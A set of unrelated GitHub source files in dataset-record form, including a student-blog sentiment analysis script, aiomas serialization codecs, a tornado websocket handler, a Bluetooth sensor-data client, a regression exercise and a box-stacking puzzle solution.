comments/'\nlecture_dicts_rootdir = 'lecture_word_dicts/'\npost1_dict = {}\npost2_dict = {}\npost3_dict = {}\npost4_dict = {}\n\nstudent_dicts = {}\nreceived_comments_dicts = {}\n\ntotal_lecture_dict = {}\n\n#To load all the text for analysing, including: blog posts and comments from each assignment, individual texts\n\ndef load_analysing_text():\n\n\tfor subdir, dirs, files in os.walk(rootdir):\n\n\t\t#Collect all the data in blog posts and comments\n\t\t\n\t\tstudent_name = os.path.basename(os.path.normpath(subdir))\n\t\t#Create a collector for each individual students\n\t\tif (student_name != 'blog and comments'):\n\t\t\tstudent_dicts[student_name] = {}\n\n\t\tfor file in files:\n\t\t\t#Collect data for blog post 1 from all students\n\t\t\tif file == 'Blog Post 1.txt':\n\t\t\t\twith open(os.path.join(subdir,file),'r') as f:\n\t\t\t\t\tword_dict = {}\n\t\t\t\t\tarticle = f.read()\n\t\t\t\t\twordlist = nltk.WordPunctTokenizer().tokenize(article)\n\t\t\t\t\td = enchant.Dict(\"en_US\")\n\t\t\t\t\t#Lowercase\n\t\t\t\t\twordlist = map(lambda x:x.lower(),wordlist)\n\t\t\t\t\tfor word, pos in nltk.pos_tag(wordlist):\n\n\t\t\t\t\t\t#Check if the word is a valid english word\n\t\t\t\t\t\tif (d.check(word) and len(word) >= 2):\n\t\t\t\t\t\t\t#Select words as our target terminologies\n\n\t\t\t\t\t\t\t#Update blog post for individual students\n\t\t\t\t\t\t\tif word not in student_dicts[student_name]:\n\t\t\t\t\t\t\t\tstudent_dicts[student_name][word] = 0\n\t\t\t\t\t\t\tstudent_dicts[student_name][word] += 1\n\n\t\t\t\t\t\t\t#Collect blog post 1 for all students\n\t\t\t\t\t\t\tif word not in post1_dict:\n\t\t\t\t\t\t\t\tpost1_dict[word] = 0\n\t\t\t\t\t\t\tpost1_dict[word] +=1\n\n\t\t\tif file == 'Blog Post 2.txt':\n\t\t\t\twith open(os.path.join(subdir,file),'r') as f:\n\t\t\t\t\tarticle = f.read()\n\t\t\t\t\twordlist = nltk.WordPunctTokenizer().tokenize(article)\n\t\t\t\t\td = enchant.Dict(\"en_US\")\n\t\t\t\t\t#Lowercase\n\t\t\t\t\twordlist = map(lambda x:x.lower(),wordlist)\n\t\t\t\t\tfor word, pos in nltk.pos_tag(wordlist):\n\n\t\t\t\t\t\t#Check if the word is a valid english word\n\t\t\t\t\t\tif (d.check(word) and len(word) >= 2):\t\t\t\t\t\n\n\t\t\t\t\t\t\t#Update blog post for individual students\n\t\t\t\t\t\t\tif word not in student_dicts[student_name]:\n\t\t\t\t\t\t\t\tstudent_dicts[student_name][word] = 0\n\t\t\t\t\t\t\tstudent_dicts[student_name][word] += 1\n\n\t\t\t\t\t\t\t#Collect blog post 2 for all students\n\t\t\t\t\t\t\tif word not in post2_dict:\n\t\t\t\t\t\t\t\tpost2_dict[word] = 0\n\t\t\t\t\t\t\tpost2_dict[word] +=1\n\n\t\t\tif file == 'Blog Post 3.txt':\n\t\t\t\twith open(os.path.join(subdir,file),'r') as f:\n\t\t\t\t\tarticle = f.read()\n\t\t\t\t\twordlist = nltk.WordPunctTokenizer().tokenize(article)\n\t\t\t\t\td = enchant.Dict(\"en_US\")\n\t\t\t\t\t#Lowercase\n\t\t\t\t\twordlist = map(lambda x:x.lower(),wordlist)\n\t\t\t\t\tfor word, pos in nltk.pos_tag(wordlist):\n\n\t\t\t\t\t\t#Check if the word is a valid english word\n\t\t\t\t\t\tif (d.check(word) and len(word) >= 2):\n\n\t\t\t\t\t\t\t#Update blog post for individual students\n\t\t\t\t\t\t\tif word not in student_dicts[student_name]:\n\t\t\t\t\t\t\t\tstudent_dicts[student_name][word] = 0\n\t\t\t\t\t\t\tstudent_dicts[student_name][word] += 1\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t#Collect blog post 3 for all students\n\t\t\t\t\t\t\tif word not in post3_dict:\n\t\t\t\t\t\t\t\tpost3_dict[word] = 0\n\t\t\t\t\t\t\tpost3_dict[word] +=1\n\n\t\t\tif file == 'Blog Post 4.txt':\n\t\t\t\twith open(os.path.join(subdir,file),'r') as f:\n\t\t\t\t\tarticle = f.read()\n\t\t\t\t\twordlist = nltk.WordPunctTokenizer().tokenize(article)\n\t\t\t\t\td = enchant.Dict(\"en_US\")\n\t\t\t\t\t#Lowercase\n\t\t\t\t\twordlist = map(lambda x:x.lower(),wordlist)\n\t\t\t\t\tfor word, pos in nltk.pos_tag(wordlist):\n\n\t\t\t\t\t\t#Check if the word is a valid english word\n\t\t\t\t\t\tif (d.check(word) and len(word) >= 2):\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t#Update blog post for individual students\n\t\t\t\t\t\t\tif word not in student_dicts[student_name]:\n\t\t\t\t\t\t\t\tstudent_dicts[student_name][word] = 0\n\t\t\t\t\t\t\tstudent_dicts[student_name][word] += 1\n\n\t\t\t\t\t\t\t#Collect blog post 4 for all students\n\t\t\t\t\t\t\tif word not in post4_dict:\n\t\t\t\t\t\t\t\tpost4_dict[word] = 0\n\t\t\t\t\t\t\tpost4_dict[word] +=1\n\n\t\t\tif file.endswith('.csv'):\n\t\t\t\twith open(os.path.join(subdir,file), 'r') as file_comments:\n\t\t\t\t\treader = csv.reader(file_comments)\n\t\t\t\t\tarticle_comments = list()\n\t\t\t\t\tarticle_comments.append('')\n\t\t\t\t\tarticle_comments.append('')\n\t\t\t\t\tarticle_comments.append('')\n\t\t\t\t\tarticle_comments.append('')\n\n\t\t\t\t\tfor row in reader:\n\t\t\t\t\t\tif (row[0] != 'Message'):\n\t\t\t\t\t\t\t#Update comment 1\n\t\t\t\t\t\t\tif (int(row[0]) <= 4 and int(row[0]) >= 1 and len(row[3])>0):\n\t\t\t\t\t\t\t\tarticle_comments[0] = article_comments[0] + row[3]\n\t\t\t\t\t\t\t#Update comment 2\n\t\t\t\t\t\t\tif (int(row[0]) <= 8 and int(row[0]) >= 5 and len(row[3])>0):\n\t\t\t\t\t\t\t\tarticle_comments[1] = article_comments[1] + row[3]\t\t\t\t\t\t\n\t\t\t\t\t\t\t#Update comment 3\n\t\t\t\t\t\t\tif (int(row[0]) <= 12 and int(row[0]) >= 9 and len(row[3])>0):\n\t\t\t\t\t\t\t\tarticle_comments[2] = article_comments[2] + row[3]\t\t\t\t\t\t\n\t\t\t\t\t\t\t#Update comment 4\n\t\t\t\t\t\t\tif (int(row[0]) <= 16 and int(row[0]) >= 13 and len(row[3])>0):\n\t\t\t\t\t\t\t\tarticle_comments[3] = article_comments[3] + row[3]\n\n\t\t\t\t\t#print the length of each(postly blog comments of each students\n\t\t\t\t\t# print(subdir, len(article_comments[0]),len(article_comments[1]),len(article_comments[2]),len(article_comments[3]))\n\n\t\t\t\tfor index, article in enumerate(article_comments):\n\t\t\t\t\twordlist = nltk.WordPunctTokenizer().tokenize(article)\n\t\t\t\t\td = enchant.Dict(\"en_US\")\n\t\t\t\t\t#Lowercase\t\t\t\t\t\t\t\n\t\t\t\t\twordlist = map(lambda x:x.lower(),wordlist)\n\t\t\t\t\tfor word, pos in nltk.pos_tag(wordlist):\n\n\t\t\t\t\t\t#Check if the word is a valid english word\n\t\t\t\t\t\tif (d.check(word) and len(word) >= 2):\n\n\t\t\t\t\t\t\t#Update blog post for individual students\n\t\t\t\t\t\t\tif word not in student_dicts[student_name]:\n\t\t\t\t\t\t\t\tstudent_dicts[student_name][word] = 0\n\t\t\t\t\t\t\tstudent_dicts[student_name][word] += 1\n\n\t\t\t\t\t\t\t#Collect comments for all students\n\t\t\t\t\t\t\tif (index == 0):\n\t\t\t\t\t\t\t\t#Collect commnets 1 for all students\n\t\t\t\t\t\t\t\tif word not in post1_dict:\n\t\t\t\t\t\t\t\t\tpost1_dict[word] = 0\n\t\t\t\t\t\t\t\tpost1_dict[word] +=1\n\n\t\t\t\t\t\t\tif (index == 1):\n\t\t\t\t\t\t\t\tif word not in post2_dict:\n\t\t\t\t\t\t\t\t\tpost2_dict[word] = 0\n\t\t\t\t\t\t\t\tpost2_dict[word] +=1\n\n\t\t\t\t\t\t\tif (index == 2):\n\t\t\t\t\t\t\t\tif word not in post3_dict:\n\t\t\t\t\t\t\t\t\tpost3_dict[word] = 0\n\t\t\t\t\t\t\t\tpost3_dict[word] +=1\n\t\t\t\t\t\t\tif (index == 3):\n\t\t\t\t\t\t\t\tif word not in post4_dict:\n\t\t\t\t\t\t\t\t\tpost4_dict[word] = 0\n\t\t\t\t\t\t\t\tpost4_dict[word] +=1\n\ndef load_comment_text():\n\tfor subdir, dirs, files in os.walk(comments_rootdir):\n\t\tfor file in files:\n\t\t\t#Create a directory for each student id\n\t\t\tif file.endswith('.txt'):\n\t\t\t\tsid = file[:-4]\n\t\t\t\tif sid not in received_comments_dicts:\n\t\t\t\t\treceived_comments_dicts[sid] = {}\n\n\t\t\t\twith open(os.path.join(subdir,file), 'r') as comments_f:\n\t\t\t\t\tarticle = comments_f.read()\n\t\t\t\t\twordlist = nltk.WordPunctTokenizer().tokenize(article)\n\t\t\t\t\td = enchant.Dict(\"en_US\")\n\t\t\t\t\t#Lowercase\n\t\t\t\t\twordlist = map(lambda x:x.lower(),wordlist)\n\t\t\t\t\tfor word, pos in nltk.pos_tag(wordlist):\n\t\t\t\t\t\t#Check if the word is a valid english word\n\t\t\t\t\t\tif (d.check(word) and len(word) >= 2):\n\n\t\t\t\t\t\t\tif word not in received_comments_dicts[sid]:\n\t\t\t\t\t\t\t\treceived_comments_dicts[sid][word] = 0\n\t\t\t\t\t\t\treceived_comments_dicts[sid][word] += 1\n\ndef load_lecture_text():\n\twith open(lecture_dicts_rootdir + 'total_word_dict.txt', 'rb') as lecture_f:\n\t\tlines = lecture_f.readlines()\n\t\tfor line in lines:\n\t\t\tline = line.split()\n\t\t\tif line[0] not in total_lecture_dict:\n\t\t\t\ttotal_lecture_dict[line[0]] = line[1]\n\ndef read_senti_dict():\n\twith open('senti_dict.txt', 'rb') as senti_f:\n\t\tsenti_data = json.load(senti_f)\n\treturn senti_data\n\n#After getting all the analysing text, start our analysing\n\n#First Sentiment Analysis -- personality analysis\n\ndef personality_analysis():\n\tsenti_data = read_senti_dict()\n\tfor student_name, individual_dict in student_dicts.iteritems():\n\t\tpos_score = 0\n\t\tneg_score = 0\n\t\ttext_length = 0\n\t\tfor word in individual_dict:\n\t\t\ttext_length += individual_dict[word]\n\n\t\t\tif word in senti_data:\n\t\t\t\tpos_score = pos_score + senti_data[word]['pos'] * individual_dict[word]\n\t\t\t\tneg_score = neg_score + senti_data[word]['neg'] * individual_dict[word]\n\t\t\telse:\n\t\t\t\tpos_score = pos_score + 0\n\t\t\t\tneg_score = neg_score + 0\n\t\tif pos_score > neg_score:\n\t\t\tpolarity = 1\n\t\telif (pos_score < neg_score):\n\t\t\tpolarity = -1\n\t\telse:\n\t\t\tpolarity = 0\n\n\n\t\tprint('Student Name: ' + student_name +\n\t\t\t', Text Length ' + str(text_length) +\n\t\t\t', Personality Scores: Positive -- ' + str(pos_score/text_length * 100 * 20) + \n\t\t\t' Critical -- ' + str(neg_score/text_length * 100 * 20) +\n\t\t\t', Polarity: ' + str(polarity) + '\\n')\n\n#Second Sentiment Analysis -- comment analysis\n\ndef sentiment_analysis():\n\tsenti_data = read_senti_dict()\n\tfor sid, comment_dict in received_comments_dicts.iteritems():\n\t\tpos_score = 0\n\t\tneg_score = 0\n\t\ttext_length = 0\n\t\tfor word in comment_dict:\n\t\t\ttext_length += comment_dict[word]\n\n\t\t\tif word in senti_data:\n\t\t\t\tpos_score = pos_score + senti_data[word]['pos'] * comment_dict[word]\n\t\t\t\tneg_score = neg_score + senti_data[word]['neg'] * comment_dict[word]\n\t\t\telse:\n\t\t\t\tpos_score = pos_score + 0\n\t\t\t\tneg_score = neg_score + 0\n\t\tif pos_score > neg_score:\n\t\t\tpolarity = 1\n\t\telif (pos_score < neg_score):\n\t\t\tpolarity = -1\n\t\telse:\n\t\t\tpolarity = 0\n\n\t\tprint('Student ID: ' + sid +\n\t\t\t', Text Length ' + str(text_length) +\n\t\t\t', Sentiment Score: Positive -- ' + str(pos_score/text_length) +\n\t\t\t', Negative -- ' + str(neg_score/text_length) +\n\t\t\t', Polarity: ' + str(polarity) + '\\n')\n\n#Third Terminology Coverage Analysis -- TCA\n\ndef coverage_analysis():\n\tterminology_usage = 0\n\tterminology_coverage = 0\n\tfor student_name, individual_dict in student_dicts.iteritems():\n\n\t\tfor word in total_lecture_dict:\n\t\t\tif word in individual_dict:\n\t\t\t\tterminology_coverage += 1\n\t\t\t\tterminology_usage += individual_dict[word]\n\n\t\tprint('Student Name: ' + student_name,\n\t\t 'Terminology Coverage: ' + str(terminology_coverage), \n\t\t 'Total terminologies: ' + str(len(total_lecture_dict)))\n\t\tprint('Student Name: ' + student_name,\n\t\t 'Terminology Usage: ' + str(terminology_usage), \n\t\t 'Total terminologies: ' + str(len(total_lecture_dict)))\n\t\tprint('\\n')\n\n\n\n\nload_analysing_text()\nload_comment_text()\nload_lecture_text()\n\npersonality_analysis()\nsentiment_analysis()\ncoverage_analysis()\n\n\n\n","repo_name":"leochli/Analysis-of-Online-Learner-Reflection","sub_path":"AnalyseText.py","file_name":"AnalyseText.py","file_ext":"py","file_size_in_byte":10145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19928630185","text":"\"\"\"\nThis package imports the codecs that can be used for de- and encoding incoming\nand outgoing messages:\n\n- :class:`JSON` uses `JSON `_\n- :class:`MsgPack` uses `msgpack `_\n- :class:`MsgPackBlosc` uses `msgpack `_ and\n `Blosc `_\n\nAll codecs should implement the base class :class:`Codec`.\n\n\"\"\"\nimport inspect\nimport json\nimport sys\n\ntry:\n import blosc\nexcept ImportError:\n blosc = None\ntry:\n import msgpack\nexcept ImportError:\n msgpack = None\n\nfrom .exceptions import SerializationError\n\n\n__all__ = ['serializable', 'Codec', 'JSON', 'MsgPack', 'MsgPackBlosc']\n\n\nTYPESIZE = 8 if sys.maxsize > 2**32 else 4\n\n\ndef serializable(cls=None, repr=True):\n \"\"\"Class decorator that makes the decorated class serializable by\n :mod:`aiomas.codecs`.\n\n The decorator tries to extract all arguments to the class’ ``__init__()``.\n That means, the arguments must be available as attributes with the same\n name.\n\n The decorator adds the following methods to the decorated class:\n\n - ``__asdict__()``: Returns a dict with all __init__ parameters\n\n - ``__fromdict__(dict)``: Creates a new class instance from *dict*\n\n - ``__serializer__()``: Returns a tuple with args for\n :meth:`Codec.add_serializer()`\n\n - ``__repr__()``: Returns a generic instance representation. Adding this\n method can be deactivated by passing ``repr=False`` to the decorator.\n\n Example:\n\n .. code-block:: python\n\n >>> import aiomas.codecs\n >>>\n >>> @aiomas.codecs.serializable\n ... class A:\n ... def __init__(self, x, y):\n ... self.x = x\n ... self._y = y\n ...\n ... @property\n ... def y(self):\n ... return self._y\n >>>\n >>> codec = aiomas.codecs.JSON()\n >>> codec.add_serializer(*A.__serializer__())\n >>> a = codec.decode(codec.encode(A(1, 2)))\n >>> a\n A(x=1, y=2)\n\n \"\"\"\n def wrap(cls):\n attrs = [a for a in inspect.signature(cls).parameters]\n\n def __asdict__(self):\n return {a: getattr(self, a) for a in attrs}\n\n @classmethod\n def __fromdict__(cls, attrs):\n return cls(**attrs)\n\n def __repr__(self):\n args = ('{}={!r}'.format(a, getattr(self, a)) for a in attrs)\n return '{}({})'.format(self.__class__.__name__, ', '.join(args))\n\n @classmethod\n def __serializer__(cls):\n return (cls, cls.__asdict__, cls.__fromdict__)\n\n cls.__asdict__ = __asdict__\n cls.__fromdict__ = __fromdict__\n cls.__serializer__ = __serializer__\n if repr:\n cls.__repr__ = __repr__\n\n return cls\n\n # The type of \"cls\" depends on the usage of the decorator. It's a class if\n # it's used as `@serializable` but ``None`` if used as `@serializable()`.\n if cls is None:\n return wrap\n else:\n return wrap(cls)\n\n\nclass Codec:\n \"\"\"Base class for all Codecs.\n\n Subclasses must implement :meth:`encode()` and :meth:`decode()`.\n\n \"\"\"\n def __init__(self):\n self._serializers = {}\n self._deserializers = {}\n\n def __str__(self):\n return '{}[{}]'.format(\n self.__class__.__name__,\n ', '.join(s.__name__ for s in self._serializers),\n )\n\n def encode(self, data):\n \"\"\"Encode the given *data* and return a :class:`bytes` object.\"\"\"\n raise NotImplementedError\n\n def decode(self, data):\n \"\"\"Decode *data* from :class:`bytes` to the original data structure.\"\"\"\n raise NotImplementedError\n\n def add_serializer(self, type, serialize, deserialize):\n \"\"\"Add methods to *serialize* and *deserialize* objects typed *type*.\n\n This can be used to de-/encode objects that the codec otherwise\n couldn't encode.\n\n *serialize* will receive the unencoded object and needs to return\n an encodable serialization of it.\n\n *deserialize* will receive an objects representation and should return\n an instance of the original object.\n\n \"\"\"\n if type in self._serializers:\n raise ValueError(\n 'There is already a serializer for type \"{}\"'.format(type))\n typeid = len(self._serializers)\n self._serializers[type] = (typeid, serialize)\n self._deserializers[typeid] = deserialize\n\n def serialize_obj(self, obj):\n \"\"\"Serialize *obj* to something that the codec can encode.\"\"\"\n orig_type = otype = type(obj)\n if otype not in self._serializers:\n # Fallback to a generic serializer (if available)\n otype = object\n\n try:\n typeid, serialize = self._serializers[otype]\n except KeyError:\n raise SerializationError('No serializer found for type \"{}\"'\n .format(orig_type)) from None\n\n try:\n return {'__type__': (typeid, serialize(obj))}\n except Exception as e:\n raise SerializationError(\n 'Could not serialize object \"{!r}\": {}'.format(obj, e)) from e\n\n def deserialize_obj(self, obj_repr):\n \"\"\"Deserialize the original object from *obj_repr*.\"\"\"\n # This method is called for *all* dicts so we have to check if it\n # contains a desrializable type.\n if '__type__' in obj_repr:\n typeid, data = obj_repr['__type__']\n obj_repr = self._deserializers[typeid](data)\n return obj_repr\n\n\nclass JSON(Codec):\n \"\"\"A :class:`Codec` that uses *JSON* to encode and decode messages.\"\"\"\n\n def encode(self, data):\n return json.dumps(data, default=self.serialize_obj).encode()\n\n def decode(self, data):\n return json.loads(data.decode(), object_hook=self.deserialize_obj)\n\n\nclass MsgPack(Codec):\n \"\"\"A :class:`Codec` that uses *msgpack* to encode and decode messages.\"\"\"\n def __init__(self):\n if msgpack is None:\n msg = (\n 'Please install \"msgpack-python\" to use the {} codec: pip '\n 'install -U aiomas[mp]'.format(self.__class__.__name__)\n )\n raise ImportError(msg)\n super().__init__()\n\n def encode(self, data):\n return msgpack.packb(\n data, default=self.serialize_obj, use_bin_type=True)\n\n def decode(self, data):\n return msgpack.unpackb(data,\n object_hook=self.deserialize_obj,\n use_list=False,\n encoding='utf-8')\n\n\nclass MsgPackBlosc(Codec):\n \"\"\"A :class:`Codec` that uses *msgpack* to encode and decode messages and\n *blosc* to compress them.\"\"\"\n def __init__(self):\n if msgpack is None or blosc is None:\n msg = (\n 'Please install \"msgpack-python\" and \"blosc\" to use the {} '\n 'codec: pip install -U aiomas[mpb]'\n .format(self.__class__.__name__)\n )\n raise ImportError(msg)\n super().__init__()\n\n def encode(self, data):\n return blosc.compress(msgpack.packb(\n data, default=self.serialize_obj, use_bin_type=True), TYPESIZE)\n\n def decode(self, data):\n return msgpack.unpackb(blosc.decompress(bytes(data)),\n object_hook=self.deserialize_obj,\n use_list=False,\n encoding='utf-8')\n","repo_name":"LeonidPilyugin/LIT1533Project","sub_path":"SatelliteClasses/SatelliteClasses/Python 3.7 (32-bit)/Lib/site-packages/aiomas/codecs.py","file_name":"codecs.py","file_ext":"py","file_size_in_byte":7498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23615269811","text":"from tornado import websocket\nimport json\n\n\nLinks = {\n \"clients\": [],\n \"pipeline_node\": None\n}\n\nclass WebSocketHandler(websocket.WebSocketHandler):\n \"\"\"\n - sending and recieving of config\n - sending of channel_data\n - sending processed data\n \"\"\"\n\n def open(self):\n if self not in Links[\"clients\"]:\n Links[\"clients\"].append(self)\n\n def on_message(self, message):\n if Links[\"pipeline_node\"] is not None:\n data = json.loads(message)\n Links[\"pipeline_node\"]._on_message(data)\n\n def on_close(self):\n if self in Links[\"clients\"]:\n Links[\"clients\"].remove(self)\n","repo_name":"nat-n/pybci","sub_path":"lib/webservice/websockets.py","file_name":"websockets.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23186844356","text":"from wielder.util.arguer import get_wielder_parser\n\n\nclass WieldServiceMode:\n \"\"\"\n WieldServiceMode is used for modality of service, server, microservice module\n image packing, provisioning, deployment ...\n * Optional mounting of local code to docker for development.\n * Optional opening of debug port for remote debugging.\n\n debug_mode: Optional opening of debug port for remote debugging.\n Done by allocating a port env variables ...\n local_mount: Optional mounting of local code to docker.\n used for local development integration with IDE.\n \"\"\"\n\n def __init__(self, debug_mode=None, local_mount=None):\n \"\"\"\n\n :param debug_mode:\n :param local_mount:\n \"\"\"\n\n wield_parser = get_wielder_parser()\n wield_args = wield_parser.parse_args()\n\n if debug_mode is None:\n debug_mode = wield_args.debug_mode\n\n if local_mount is None:\n local_mount = wield_args.local_mount\n\n self.debug_mode = debug_mode\n self.local_mount = local_mount\n\n\n","repo_name":"hamshif/Wielder","sub_path":"wielder/wield/modality.py","file_name":"modality.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31300142512","text":"import imp\nimport os, time\n#import imumsg_pb2.py\nimport socket,struct\nfrom bluetooth import *\nimport bluetooth\nfrom dataTransferServer import commonBTAdress\nfrom socketHandler import *\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\nimuMsgPath = dir_path+ \"\\\\release\\\\imumsg_pb2.py\"\nprint(imuMsgPath)\nimuMsg = imp.load_source(\"imumsg_pb2\",imuMsgPath)\n\nHOST = '127.0.0.1' # Standard loopback interface address (localhost)\nPORT = 65432 # Port to listen on (non-privileged ports are > 1023)\n\nbluetoothHost = 1\nbluetoothPort = 2\n\nclass dataTransferClient(threading.Thread):\n\n\tisConnected = False\n\t#1 BlueTooth \n\tdef __init__(self, BTAdress, dataHandler):\n\t\tthreading.Thread.__init__(self)\n\t\t#self.startClientWifi()\n\t\t# self.startClientBlueTooth()\n\t\tself.serverAddress = BTAdress\n\t\tself._dataHandler = dataHandler\n\n\tdef run(self):\n\t\tself.sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\n\t\twhile True:\n\t\t\tif not self.isConnected:\n\t\t\t\tself.connect()\n\t\t\ttime.sleep(2)\n\n\tdef connect(self):\n\t\ttry:\n\t\t\tself.sock.connect((self.serverAddress,1))\n\t\t\tprint(\"Connected to Socket\")\n\t\t\tself.isConnected = True\n\n\n\t\t\tself._HC05LeftDataThread = socketHandler(self.sock,self, self._dataHandler)\n\t\t\tself._HC05LeftDataThread.start()\t\t\t\n\t\texcept Exception as e:\t\n\t\t\tprint(\"Server Not Avail\")\n\n\n\tdef onSocketShutdown(self):\n\t\tself.isConnected = False\n\n\t#Ran after connection is made\n\tdef controlLoop(self):\n\t\tself.sendMsg(msg)\n\t\tpass\n\n\n\tdef sendMsg(self, msg):\n\n\t\tmsgLen = len(msg)\n\n\t\t#Send the length of message. I denote max of 4 bytes or unsigned int32\n\t\tmsgLenArray = struct.pack(\"I\", msgLen)\n\n\t\tfor byte in msgLenArray:\n\t\t\tprint(\"Sending\")\n\t\t\tprint(byte)\n\t\t\tself._client.send(byte)\n\n\t\ttotalSent=0\n\t\twhile totalSent < msgLen:\n\t\t\t#Sent will always be one (as a byte is sent)\n\t\t\tsent = self._client.send(msg[totalSent])\n\t\t\ttotalSent = sent + totalSent\n\n\t\t\n\nclass sensorMsgGenerator():\n\tdef __init__(self):\n\t\tpass\n\n\tdef getMsg():\n\t\t_imuMsg = imuMsg.IMUInfo()\n\t\t_imuMsg.acc_x=float(2.0)\n\t\t_imuMsg.acc_y=float(3.524)\n\t\tprint(\"Value: %f\" %_imuMsg.acc_x)\n\t\tprint(\"Value: %f\" %_imuMsg.acc_y)\n\t\t#len(s.encode('utf-8'))\n\t\tbinaryMsg = _imuMsg.SerializeToString()\n\t\tlength = len( binaryMsg )\t\n\t\treturn binaryMsg\n\n# if __name__==\"__main__\":\n# \t#client = TCPClient()\n# \t# i = 0\n# \t# while i < 10:\n# \t# \tclient.sendMsg(getMsg())\n# \t# \ti = i + 1\n# \tbtLookUp()\n\t\n# \t#name = raw_input(\"What is your name? \")","repo_name":"ahmadnav/UBCCapstone","sub_path":"wirlessDataTransfer/dataTransferClient.py","file_name":"dataTransferClient.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8539070567","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 10 17:24:51 2015\n\n@author: fernanda\n\"\"\"\n#cd /Users/fernanda/Dropbox/batmelon/aprendizaje/Aprendizaje/datos\n\n\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndf3=pd.read_csv(\"regLinPoli.csv\")\n\n\nX_train, X_test, Y_train, Y_test = train_test_split(df3[['X','X2','X3','X4']],df3['y'],train_size=0.85)\n\nscaleX=StandardScaler()\nscaleY=StandardScaler()\nscaleX.fit(X_train)\nX_train=scaleX.transform(X_train)\nscaleY.fit(Y_train)\nY_train=scaleY.transform(Y_train)\n\n\nX_train = np.array(X_train);Y_train = np.array(Y_train)\nX_test = np.array(X_test);Y_test = np.array(Y_test)\n\nw=np.array([10.0,10.0,10.0,10.0,10.0])\n\ndef salida(w,x):\n w = np.array(w)\n x = np.array(x)\n x=np.insert(x,0,1)\n res = float(np.dot(x,w))\n return(res)\n \ndef entrena(w,X_train,Y_train,eta=0.000001):\n errores=[]\n for i in range(len(X_train)):\n errores.append(Y_train[i] - (salida(w,X_train[i]) ))\n w_anterior=np.array([element for element in w])\n new_X_train=np.insert(X_train,0,1)\n for i in range(len(w)): \n w[i] = w[i] + eta * ( Y_train[i] - (salida(w_anterior,X_train[i]) ))*new_X_train[i]\n return(errores,w)\n \nerrores,w=entrena(w,X_train,Y_train,eta=0.0000001) \n\nscaleX=StandardScaler()\nscaleY=StandardScaler()\nscaleX.fit(X_train)\nX_test=scaleX.transform(X_test)\nscaleY.fit(Y_train)\nY_test=scaleY.transform(Y_test)\n\ndef errores_test(x,y,w):\n errores_test=[]\n for i in range(len(x)):\n errores_test.append(y[i] - (salida(w,x[i]) ))\n return errores_test\n\nerrores_test=errores_test(X_test,Y_test,w) \n\nplt.plot(range(len(X_train)),errores,color='blue')\n\nplt.plot(range(len(X_test)),errores_test,color='green')","repo_name":"omisimo/machine_learning","sub_path":"Aprendizaje/grupoJueves/Regularizacion/Fer_Alcala_Regularizacion.py","file_name":"Fer_Alcala_Regularizacion.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34338029450","text":"\"\"\"\nYou have a stack of n boxes, with width w(i),height h(i), depth d(i). The boxes\ncannot be rotated and can only be stacked on top of one another if each box in \nthe stack is strictly larger than the box above it in width,height and depth.\n\nImplement a method to build the tallest stack possible,where the height of stack \nis the sum of the heights of each box.\n\nTime Complexity :\nSpace Complexity : \n\"\"\"\n\n__author__ = \"Ravi Kiran Chadalawada\"\n__email__ = \"rchadala@usc.edu\"\n__credits__ = [\"Cracking The coding interview\"]\n__status__ = \"Prototype\"\n\n\n\ndef find_tallest_stack(boxes, bottom):\n\t\"\"\" Returns the tallest stack\n\t\"\"\"\n\tmax_height = 0\n\tmax_stack = []\n\tfor box in boxes:\n\t\tif (is_valid(box,bottom)):\n\t\t\tcurrent_stack = find_tallest_stack(boxes, box)\n\t\t\tcurrent_height = len(current_stack)\t\n\t\t\t\n\t\t\tif current_height > max_height:\n\t\t\t\tmax_height = current_height\n\t\t\t\tmax_stack = current_stack\n\n\tif len(bottom):\n\t\tmax_stack.append(bottom)\n\n\treturn max_stack\n\ndef is_valid(box,bottom):\n\tif len(bottom) == 0:\n\t\treturn True\n\n\telif box[0] > bottom[0] and \\\n\t\t box[1] > bottom[1] and \\\n\t\t box[2] > bottom[2]:\n\t\treturn True\n\n\telse:\n\t\treturn False\n\nif __name__=='__main__':\n\n\tboxes = [[1,2,3]\n\t\t\t [4,5,6]\n\t\t\t]\n","repo_name":"ravisrhyme/CTCI","sub_path":"chapter9/9.10.py","file_name":"9.10.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73965219753","text":"import os\r\nimport input_data\r\nimport tensorflow.compat.v1 as tf\r\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\r\ntf.logging.set_verbosity(tf.compat.v1.logging.ERROR)\r\ntf.disable_v2_behavior()\r\nfrom sklearn.model_selection import train_test_split\r\nimport numpy as np\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nfrom time import time\r\n\r\n# 将 numpy 数组中的图片和标签顺序打乱\r\ndef shuffer_images_and_labels(images, labels):\r\n shuffle_indices = np.random.permutation(np.arange(len(images)))\r\n shuffled_images = images[shuffle_indices]\r\n shuffled_labels = labels[shuffle_indices]\r\n return shuffled_images, shuffled_labels\r\n\r\n# 将label从长度10的one hot向量转换为0~9的数字\r\n# 例:get_label(total_labels[0]) 获取到total_labels中第一个标签对应的数字\r\ndef get_label(label):\r\n return np.argmax(label)\r\n\r\ndef show_image(image):\r\n tmp = np.zeros((28,28))\r\n for i in range(len(image)):\r\n tmp[i//28][i%28] = image[i]\r\n 